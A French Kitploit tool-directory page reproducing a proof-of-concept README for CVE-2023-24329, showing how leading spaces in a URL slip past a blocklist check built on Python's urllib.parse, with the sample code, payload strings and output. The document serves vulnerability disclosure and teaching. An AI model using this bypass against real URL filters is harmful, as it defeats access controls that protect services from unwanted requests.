Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-24329-Exploit — Preuve de concept démontrant un contournement de l'analyse d'URL dans urllib.parse de Python (CVE-2023-24329) qui permet de contourner les listes noires en ajoutant des espaces au début. | Kitploit
Outils/GitHubGitHub/pentestmano/cve-2023-24329-exploit
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubpentestmano/cve-2023-24329-exploit

CVE-2023-24329-Exploit

Preuve de concept démontrant un contournement de l'analyse d'URL dans urllib.parse de Python (CVE-2023-24329) qui permet de contourner les listes noires en ajoutant des espaces au début.

Voir le dépôt
3il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Introduction

Les fonctions d'analyse d'URL se concentrent sur la division d'une chaîne d'URL en ses composants, ou sur la combinaison de composants d'URL en une chaîne d'URL.

  • urllib.parse.urlparse

Simplement urllib.parse utilisé pour analyser les URLs, nous pouvons le contourner en ajoutant des espaces avant l'URL. Cela se produit dans python 3.11.4 et avant.

Preuve de concept

Décomposons example.py

Voici un ensemble de sites web auxquels vous ne devez pas accéder :

root@kitploit:~
blocked_list = [
    "http://example.com/",
    "http://example2.com/"
]

Cette fonction vérifie si le site web est sur la liste bloquée ou non, s'il est sur la liste bloquée, elle doit retourner URL Blocked

root@kitploit:~
def is_url_blocked(url):
    parse = urllib.parse.urlparse(url).geturl()
    if  parse in blocked_list: return 'URL Blocked'
    else: return 'Bypassed'

Maintenant, j'ai ajouté deux URLs et je vérifie si l'une d'elles est bloquée et ne peut pas être accessible :

root@kitploit:~
payload1 = "    http://example.com/"
payload2 = "http://example.com/"

print(
    is_url_blocked(payload1),
    "\n",
    is_url_blocked(payload2)
)

payload1 est là où j'ai contourné is_url_blocked() car ajouter un long espace avant l'URL contournera urllib.parse.urlparse(url).geturl() qui ne s'exécutera pas comme prévu. C'est pourquoi la sortie est

root@kitploit:~
Bypassed

Mais sur payload2 nous obtenons

root@kitploit:~
URL Blocked

Soutien

Si vous souhaitez me soutenir par un don, je vous recommande de le donner à quelqu'un qui en a vraiment besoin, s'il vous plaît. Si vous le faites, considérez que j'ai gagné votre soutien.

Buy Me A Coffee

Télécharger l’outil